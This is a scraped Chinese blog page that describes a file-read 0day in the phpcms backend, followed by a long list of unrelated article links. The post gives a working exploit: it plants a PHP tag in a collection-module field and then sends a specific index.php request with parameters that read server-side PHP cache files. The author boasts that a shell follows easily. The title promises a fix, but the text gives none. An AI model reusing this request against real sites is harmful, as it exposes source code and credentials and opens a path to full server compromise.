当前位置: 首页 > news >正文

phpcms后台普通用户读文件0day及修复

news 来源:原创 2024/5/6 1:13:12

后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?[内容]?>

然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx

拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读连接文件,并且还不能连),反正我是可以拿到shell。


相关文章:

  • Kesion cms 路径泄露漏洞
  • asp中容错语句的使用
  • 防止SQL注入
  • 解决ASP防SQL注入攻击程序问题
  • Discuz7.X通杀0day(UCenter Home-2.0) poc
  • Kracker路由器破解工具
  • 代码之美 - 如何写出优雅的PHP代码
  • Mysql数据库的安全设置方法大全
  • Struts 2实现文件过滤
  • ewebeditor安全解决方案
  • 文件上传过滤
  • 拦截器实现文件过滤(JSP)
  • LFI本地包含漏洞利用小技巧
  • MSSQL注入防范安全策略大全
  • NWebsec 1.0.3 The Security library for ASP.NET
  • JavaScript-如何实现克隆(clone)函数
  • 4. 路由到控制器 - Laravel从零开始教程
  • Android Studio:GIT提交项目到远程仓库
  • AzureCon上微软宣布了哪些容器相关的重磅消息
  • C++11: atomic 头文件
  • extract-text-webpack-plugin用法
  • flask接收请求并推入栈
  • Javascript 原型链
  • JS正则表达式精简教程(JavaScript RegExp 对象)
  • laravel5.5 视图共享数据
  • Perseus-BERT——业内性能极致优化的BERT训练方案
  • WordPress 获取当前文章下的所有附件/获取指定ID文章的附件(图片、文件、视频)...
  • 阿里云前端周刊 - 第 26 期
  • 第十八天-企业应用架构模式-基本模式
  • 关于使用markdown的方法(引自CSDN教程)
  • 聊聊sentinel的DegradeSlot
  • 深入浅出Node.js
  • 小程序开发之路(一)
  • 学习笔记TF060:图像语音结合,看图说话
  • 京东物流联手山西图灵打造智能供应链,让阅读更有趣 ...
  • ​软考-高级-系统架构设计师教程(清华第2版)【第9章 软件可靠性基础知识(P320~344)-思维导图】​
  • !$boo在php中什么意思,php前戏
  • # 20155222 2016-2017-2 《Java程序设计》第5周学习总结
  • #define MODIFY_REG(REG, CLEARMASK, SETMASK)
  • #NOIP 2014#day.2 T1 无限网络发射器选址
  • $Django python中使用redis, django中使用(封装了),redis开启事务(管道)
  • (1)(1.13) SiK无线电高级配置(五)
  • (16)UiBot:智能化软件机器人(以头歌抓取课程数据为例)
  • (C语言)逆序输出字符串
  • (delphi11最新学习资料) Object Pascal 学习笔记---第8章第2节(共同的基类)
  • (DenseNet)Densely Connected Convolutional Networks--Gao Huang
  • (vue)页面文件上传获取:action地址
  • (六) ES6 新特性 —— 迭代器(iterator)
  • (十五)Flask覆写wsgi_app函数实现自定义中间件
  • (四)docker:为mysql和java jar运行环境创建同一网络,容器互联
  • (转)【Hibernate总结系列】使用举例
  • (转)EXC_BREAKPOINT僵尸错误
  • (轉)JSON.stringify 语法实例讲解
  • .mkp勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
  • .net CHARTING图表控件下载地址